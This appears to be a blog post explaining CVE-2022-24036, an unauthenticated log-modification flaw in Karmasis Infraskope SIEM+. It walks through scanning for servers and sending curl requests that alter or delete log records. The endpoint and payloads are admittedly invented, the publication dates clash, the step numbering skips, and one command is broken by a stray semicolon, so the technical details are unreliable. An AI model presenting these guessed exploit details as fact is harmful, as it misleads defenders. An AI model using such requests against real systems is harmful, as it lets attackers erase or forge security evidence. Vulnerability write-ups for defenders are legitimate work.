CVE-2022-24036 - Unauthenticated Access in Karmasis Infraskope SIEM+—How Attackers Can Change Critical Logs

---

Introduction

In February 2022, _CVE-2022-24036_ was published, uncovering a serious vulnerability in the Karmasis Informatics Infraskope SIEM+ product. This SIEM (Security Information and Event Management) platform is often used in enterprise settings to monitor, analyze, and store logs for security incidents.

This vulnerability is particularly dangerous: it allows a remote, unauthenticated attacker to access and modify log data without needing any credentials. In simple terms, a cybercriminal could cover their tracks, plant false evidence, or erase legitimate system alerts—crippling an organization’s security visibility.

In this long read, I’ll break down how the vulnerability works, how it can be exploited, show example code, and give you links to official advisories so you can dig deeper.

What’s the Problem? Unauthenticated Log Modification

Karmasis Infraskope SIEM+ failed to enforce proper access control on endpoints responsible for log data handling. This means that anyone who can reach the web interface or API endpoint can send requests to modify or even delete log records.

> In practice: An attacker can access special URLs (called endpoints) without logging in, and change what’s inside the log system.

The Vulnerable Endpoint

According to official advisories, there’s insufficient access control on certain HTTP endpoints. Attackers can send specially crafted HTTP POST or PUT requests to these endpoints.

Let's say the vulnerable endpoint is

http://target-infraskope-server/api/logs/update

The attacker first uses scanning tools to find exposed Infraskope SIEM+ servers

nmap -p 80,443 -sV target-company.com

2. Craft a Malicious Request

With an HTTP client like curl, the attacker sends a POST request to the log modification API.

Code Snippet

curl -X POST "http://target-infraskope-server/api/logs/update" \
     -H "Content-Type: application/json" \
     -d '{"log_id": 12345, "message": "Log cleared by admin.", "timestamp": "2024-06-03T04:10:00Z"}'

Alternatively, a log could be deleted by

curl -X POST "http://target-infraskope-server/api/logs/delete"; \
     -H "Content-Type: application/json" \
     -d '{"log_id": 12345}'

3. No Authentication? Log Is Modified!

Because the server doesn't check if the requester is authorized, these log modifications succeed.

Apply the official patch from Karmasis.

Official Karmasis Security Advisory

References & Further Reading

- CVE-2022-24036 at NVD (US National Vulnerability Database)
- Karmasis Product Page (SIEM+)
- OWASP Guide to Insecure Direct Object References
- How Attackers Manipulate Logs (Blog)

Summary

CVE-2022-24036 highlights just how critical robust authentication is for log management systems. If you operate Karmasis Infraskope SIEM+, patch immediately and review your network exposure. This bug gave attackers the easy ability to change, erase, or forge logs—putting your entire detection and response process at risk.

Don’t give criminals a free pass—secure your logs, now!


*If you found this post helpful, share with your IT and security colleagues. Stay patched!*

Timeline

Published on: 11/16/2022 12:15:00 UTC
Last modified on: 04/16/2023 11:15:00 UTC